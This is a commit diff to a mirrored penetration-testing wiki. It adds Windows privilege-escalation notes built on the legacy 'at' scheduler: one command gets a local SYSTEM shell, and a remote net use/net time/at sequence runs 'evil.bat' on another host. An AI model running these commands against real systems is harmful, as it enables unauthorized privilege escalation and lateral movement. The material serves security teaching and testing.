mirror of
https://github.com/oXis/pwnwiki.github.io.git
synced 2025-10-29 16:56:59 +00:00
Continued to add content from Rob's talk. Stopped at slide 35. More to come.
This commit is contained in:
parent
62a18ac3e0
commit
0f442d0f80
@ -3,3 +3,14 @@
|
|||||||
Command that can be executed from the context of a shell prompt that help escalate or increase attacker privilege of the target.
|
Command that can be executed from the context of a shell prompt that help escalate or increase attacker privilege of the target.
|
||||||
|
|
||||||
* [UAC](uac.md) - How to bypass UAC.
|
* [UAC](uac.md) - How to bypass UAC.
|
||||||
|
|
||||||
|
# General Commands
|
||||||
|
### at (Scheduler)
|
||||||
|
* **Command with arguments**: `at [TIME] [cmd]`
|
||||||
|
* **Description**: This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system.
|
||||||
|
* **Examples**:
|
||||||
|
* Locally - `at 13:20 /interactive cmd`
|
||||||
|
* Remotely - From http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607
|
||||||
|
* `net use \\[computername|IP] /user:DOMAIN\username password`
|
||||||
|
* `net time \\[computername|IP]`
|
||||||
|
* `at \\[computername|IP] 13:20 c:|temp\evil.bat`
|
||||||
Loading…
x
Reference in New Issue
Block a user